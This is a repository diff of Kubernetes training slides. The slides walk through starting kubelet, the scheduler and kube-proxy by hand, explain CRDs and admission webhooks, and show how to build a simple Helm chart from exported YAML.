(`kubectl get nodes` shows an empty list)
- We need to:
- start a container engine
- start kubelet
---
## Starting a container engine
- We're going to use Docker (because it's the default option)
.exercise[
- Start the Docker Engine:
```bash
dockerd
```
]
Success!
Feel free to check that it actually works with e.g.:
```bash
docker run alpine echo hello world
```
---
## Starting kubelet
- If we start kubelet without arguments, it *will* start
- But it will not join the cluster!
- It will start in *standalone* mode
- Just like with the controller manager, we need to tell kubelet where the API server is
- Alas, kubelet doesn't have a simple `--master` option
- We have to use `--kubeconfig`
- We need to write a `kubeconfig` file for kubelet
---
## Writing a kubeconfig file
- We can copy/paste a bunch of YAML
- Or we can generate the file with `kubectl`
.exercise[
- Create the file `kubeconfig.kubelet` with `kubectl`:
```bash
kubectl --kubeconfig kubeconfig.kubelet config \
set-cluster localhost --server http://localhost:8080
kubectl --kubeconfig kubeconfig.kubelet config \
set-context localhost --cluster localhost
kubectl --kubeconfig kubeconfig.kubelet config \
use-context localhost
```
]
---
## All Kubernetes clients can use `kubeconfig`
- The `kubeconfig.kubelet` file has the same format as e.g. `~/.kubeconfig`
- All Kubernetes clients can use a similar file
- The `kubectl config` commands can be used to manipulate these files
- This highlights that kubelet is a "normal" client of the API server
---
## Our `kubeconfig.kubelet` file
The file that we generated looks like the one below.
That one has been slightly simplified (removing extraneous fields), but it is still valid.
```yaml
apiVersion: v1
kind: Config
current-context: localhost
contexts:
- name: localhost
context:
cluster: localhost
clusters:
- name: localhost
cluster:
server: http://localhost:8080
```
---
## Starting kubelet
.exercise[
- Start kubelet with that `kubeconfig.kubelet` file:
```bash
kubelet --kubeconfig kubeconfig.kubelet
```
]
Success!
---
## Looking at our 1-node cluster
- Let's check that our node registered correctly
.exercise[
- List the nodes in our cluster:
```bash
kubectl get nodes
```
]
Our node should show up.
Its name will be its hostname (it should be `dmuc1`).
---
## Are we there yet?
- Let's check if our pod is running
.exercise[
- List all resources:
```bash
kubectl get all
```
]
--
Our pod is still `Pending`. 🤔
--
Which is normal: it needs to be *scheduled*.
(i.e., something needs to decide on which node it should go.)
---
## Scheduling our pod
- Why do we need a scheduling decision, since we have only one node?
- The node might be full, unavailable; the pod might have constraints ...
- The easiest way to schedule our pod is to start the scheduler
(we could also schedule it manually)
---
## Starting the scheduler
- The scheduler also needs to know how to connect to the API server
- Just like for controller manager, we can use `--kubeconfig` or `--master`
.exercise[
- Start the scheduler:
```bash
kube-scheduler --master http://localhost:8080
```
]
- Our pod should now start correctly
---
## Checking the status of our pod
- Our pod will go through a short `ContainerCreating` phase
- Then it will be `Running`
.exercise[
- Check pod status:
```bash
kubectl get pods
```
]
Success!
---
class: extra-details
## Scheduling a pod manually
- We can schedule a pod in `Pending` state by creating a Binding, e.g.:
```bash
kubectl create -f- <<EOF
apiVersion: v1
kind: Binding
metadata:
name: name-of-the-pod
target:
apiVersion: v1
kind: Node
name: name-of-the-node
EOF
```
- This is actually how the scheduler works!
- It watches pods, takes scheduling decisions, creates Binding objects
---
## Connecting to our pod
- Let's check that our pod correctly runs NGINX
.exercise[
- Check our pod's IP address:
```bash
kubectl get pods -o wide
```
- Send some HTTP request to the pod:
```bash
curl `X.X.X.X`
```
]
We should see the `Welcome to nginx!` page.
---
## Exposing our Deployment
- We can now create a Service associated to this Deployment
.exercise[
- Expose the Deployment's port 80:
```bash
kubectl expose deployment web --port=80
```
- Check the Service's ClusterIP, and try connecting:
```bash
kubectl get service web
curl http://`X.X.X.X`
```
]
--
This won't work. We need kube-proxy to enable internal communication.
---
## Starting kube-proxy
- kube-proxy also needs to connect to API server
- It can work with the `--master` flag
(even though that will be deprecated in the future)
.exercise[
- Start kube-proxy:
```bash
kube-proxy --master http://localhost:8080
```
]
---
## Connecting to our Service
- Now that kube-proxy is running, we should be able to connect
.exercise[
- Check the Service's ClusterIP again, and retry connecting:
```bash
kubectl get service web
curl http://`X.X.X.X`
```
]
Success!
---
class: extra-details
## How kube-proxy works
- kube-proxy watches Service resources
- When a Service is created or updated, kube-proxy creates iptables rules
.exercise[
- Check out the `OUTPUT` chain in the `nat` table:
```bash
iptables -t nat -L OUTPUT
```
- Traffic is sent to `KUBE-SERVICES`; check that too:
```bash
iptables -t nat -L KUBE-SERVICES
```
]
For each Service, there is an entry in that chain.
---
class: extra-details
## Diving into iptables
- The last command showed a chain named `KUBE-SVC-...` corresponding to our service
.exercise[
- Check that `KUBE-SVC-...` chain:
```bash
iptables -t nat -L `KUBE-SVC-...`
```
- It should show a jump to a `KUBE-SEP-...` chain; check it out too:
```bash
iptables -t nat -L `KUBE-SEP-...`
```
]
This is a `DNAT` rule to rewrite the destination address of the connection to our pod.
This is how kube-proxy works!
---
class: extra-details
## kube-router, IPVS
- With recent versions of Kubernetes, it is possible to tell kube-proxy to use IPVS
- IPVS is a more powerful load balancing framework
(remember: iptables was primarily designed for firewalling, not load balancing!)
- It is also possible to replace kube-proxy with kube-router
- kube-router uses IPVS by default
- kube-router can also perform other functions
(e.g., we can use it as a CNI plugin to provide pod connectivity)
---
class: extra-details
## What about the `kubernetes` service?
- If we try to connect, it won't work
(by default, it should be `10.0.0.1`)
- If we look at the Endpoints for this service, we will see one endpoint:
`host-address:6443`
- By default, the API server expects to be running directly on the nodes
(it could be as a bare process, or in a container/pod using host network)
- ... And it expects to be listening on port 6443 with TLS
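We can verify both points from the command line:
```bash
kubectl get service kubernetes
kubectl get endpoints kubernetes
```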

View File

@@ -1,220 +0,0 @@
# Extending the Kubernetes API
There are multiple ways to extend the Kubernetes API.
We are going to cover:
- Custom Resource Definitions (CRDs)
- Admission Webhooks
---
## Revisiting the API server
- The Kubernetes API server is a central point of the control plane
(everything connects to it: controller manager, scheduler, kubelets)
- Almost everything in Kubernetes is materialized by a resource
- Resources have a type (or "kind")
(similar to strongly typed languages)
- We can see existing types with `kubectl api-resources`
- We can list resources of a given type with `kubectl get <type>`
---
## Creating new types
- We can create new types with Custom Resource Definitions (CRDs)
- CRDs are created dynamically
(without recompiling or restarting the API server)
- CRDs themselves are resources:
- we can create a new type with `kubectl create` and some YAML
- we can see all our custom types with `kubectl get crds`
- After we create a CRD, the new type works just like built-in types
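Here is a small hedged example (using the `apiextensions.k8s.io/v1beta1` API matching the Kubernetes versions used in these slides; the `Coffee` type is made up for illustration):
```bash
kubectl apply -f- <<'EOF'
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: coffees.container.training
spec:
  group: container.training
  version: v1alpha1
  scope: Namespaced
  names:
    plural: coffees
    singular: coffee
    kind: Coffee
EOF

# The new type immediately works like built-in ones:
kubectl get crds
kubectl apply -f- <<'EOF'
apiVersion: container.training/v1alpha1
kind: Coffee
metadata:
  name: arabica
spec:
  taste: strong
EOF
kubectl get coffees
```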
---
## What can we do with CRDs?
There are many possibilities!
- *Operators* encapsulate complex sets of resources
(e.g.: a PostgreSQL replicated cluster; an etcd cluster...
<br/>
see [awesome operators](https://github.com/operator-framework/awesome-operators) and
[OperatorHub](https://operatorhub.io/) to find more)
- Custom use-cases like [gitkube](https://gitkube.sh/)
- creates a new custom type, `Remote`, exposing a git+ssh server
- deploy by pushing YAML or Helm charts to that remote
- Replacing built-in types with CRDs
(see [this lightning talk by Tim Hockin](https://www.youtube.com/watch?v=ji0FWzFwNhA&index=2&list=PLj6h78yzYM2PZf9eA7bhWnIh_mK1vyOfU))
---
## Little details
- By default, CRDs are not *validated*
(we can put anything we want in the `spec`)
- When creating a CRD, we can pass an OpenAPI v3 schema (BETA!)
(which will then be used to validate resources; see the sketch below)
- Generally, when creating a CRD, we also want to run a *controller*
(otherwise nothing will happen when we create resources of that type)
- The controller will typically *watch* our custom resources
(and take action when they are created/updated)
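
As an illustration of that validation, with `apiextensions.k8s.io/v1beta1` the schema goes under `spec.validation`. A sketch, continuing the hypothetical `Coffee` CRD shown earlier (field names are invented):

```yaml
spec:
  # ...group, names, scope, etc. as before...
  validation:
    openAPIV3Schema:
      properties:
        spec:
          required: ["flavor"]
          properties:
            flavor:
              type: string
            strength:
              type: integer
              minimum: 1
```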
*Examples:
[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)*
---
## Service catalog
- *Service catalog* is another extension mechanism
- Strictly speaking, it's not extending the Kubernetes API
(but it still provides new features!)
- It doesn't create new types; it uses:
- ClusterServiceBroker
- ClusterServiceClass
- ClusterServicePlan
- ServiceInstance
- ServiceBinding
- It uses the Open Service Broker API
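
Assuming the Service Catalog components are installed in the cluster (they are not, by default), those resources can be listed like any others; for instance:

```bash
kubectl get clusterservicebrokers
kubectl get clusterserviceclasses
kubectl get clusterserviceplans
```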
---
## Admission controllers
- When a Pod is created, it is associated with a ServiceAccount
(even if we did not specify one explicitly)
- That ServiceAccount was added on the fly by an *admission controller*
(specifically, a *mutating admission controller*)
- Admission controllers sit on the API request path
(see the cool diagram on the next slide, courtesy of Banzai Cloud)
---
class: pic
![API request lifecycle](images/api-request-lifecycle.png)
---
## Admission controllers
- *Validating* admission controllers can accept/reject the API call
- *Mutating* admission controllers can modify the API request payload
- Both types can also trigger additional actions
(e.g. automatically create a Namespace if it doesn't exist)
- There are a number of built-in admission controllers
(see [documentation](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#what-does-each-admission-controller-do) for a list)
- But we can also define our own!
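
Built-in admission controllers are compiled into the API server, and the active set is controlled by flags on its command line. An illustrative fragment (the default set depends on the Kubernetes version, and many other flags are needed for a working API server):

```bash
# Enable the plugin that auto-creates missing Namespaces
kube-apiserver --enable-admission-plugins=NamespaceAutoProvision
```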
---
## Admission Webhooks
- We can set up *admission webhooks* to extend the behavior of the API server
- The API server will submit incoming API requests to these webhooks
- These webhooks can be *validating* or *mutating*
- Webhooks can be set up dynamically (without restarting the API server)
- To set up a dynamic admission webhook, we create a special resource:
a `ValidatingWebhookConfiguration` or a `MutatingWebhookConfiguration`
- These resources are created and managed like other resources
(i.e. `kubectl create`, `kubectl get` ...)
---
## Webhook Configuration
- A ValidatingWebhookConfiguration or MutatingWebhookConfiguration contains:
- the address of the webhook
- the authentication information to use with the webhook
- a list of rules
- The rules indicate for which objects and actions the webhook is triggered
(to avoid e.g. triggering webhooks when setting up webhooks)
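
Here is a rough sketch of what such a configuration might look like (the webhook name, service name, and rules are invented for illustration; a real one also needs a `caBundle` so that the API server can verify the webhook's certificate):

```yaml
apiVersion: admissionregistration.k8s.io/v1beta1
kind: ValidatingWebhookConfiguration
metadata:
  name: example-policy
webhooks:
- name: pods.example.container.training
  clientConfig:
    service:
      namespace: webhooks
      name: example-policy
      path: /validate
  rules:
  # only trigger for Pod creation
  - apiGroups: [""]
    apiVersions: ["v1"]
    operations: ["CREATE"]
    resources: ["pods"]
```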
---
## (Ab)using the API server
- If we need to store something "safely" (as in: in etcd), we can use CRDs
- This gives us primitives to read/write/list objects (and optionally validate them)
- The Kubernetes API server can run on its own
(without the scheduler, controller manager, and kubelets)
- By loading CRDs, we can have it manage totally different objects
(unrelated to containers, clusters, etc.)
---
## Documentation
- [Custom Resource Definitions: when to use them](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/)
- [Custom Resource Definitions: how to use them](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions/)
- [Service Catalog](https://kubernetes.io/docs/concepts/extend-kubernetes/service-catalog/)
- [Built-in Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/)
- [Dynamic Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/)

View File

@@ -111,7 +111,7 @@
- Display that key:
```
kubectl logs deployment/flux | grep identity
kubectl logs deployment flux | grep identity
```
- Then add that key to the repository, giving it **write** access
@@ -234,6 +234,6 @@
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
- Gitkube can also deploy Helm charts
- Gitkube can also deploy Helm Charts
(instead of raw YAML files)

View File

@@ -1,4 +1,4 @@
# Healthchecks (extra material)
# Healthchecks
- Kubernetes provides two kinds of healthchecks: liveness and readiness

View File

@@ -164,15 +164,74 @@ The chart's metadata includes an URL to the project's home page.
---
## Viewing installed charts
## Creating a chart
- Helm keeps track of what we've installed
- We are going to show a way to create a *very simplified* chart
- In a real chart, *lots of things* would be templatized
(Resource names, service types, number of replicas...)
.exercise[
- List installed Helm charts:
- Create a sample chart:
```bash
helm list
helm create dockercoins
```
- Move away the sample templates and create an empty template directory:
```bash
mv dockercoins/templates dockercoins/default-templates
mkdir dockercoins/templates
```
]
---
## Exporting the YAML for our application
- The following section assumes that DockerCoins is currently running
.exercise[
- Create one YAML file for each resource that we need:
.small[
```bash
while read kind name; do
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
done <<EOF
deployment worker
deployment hasher
daemonset rng
deployment webui
deployment redis
service hasher
service rng
service webui
service redis
EOF
```
]
]
---
## Testing our helm chart
.exercise[
- Let's install our helm chart! (`dockercoins` is the path to the chart)
```
helm install dockercoins
```
]
--
- Since the application is already deployed, this will fail:<br>
`Error: release loitering-otter failed: services "hasher" already exists`
- To avoid naming conflicts, we will deploy the application in another *namespace*

Some files were not shown because too many files have changed in this diff.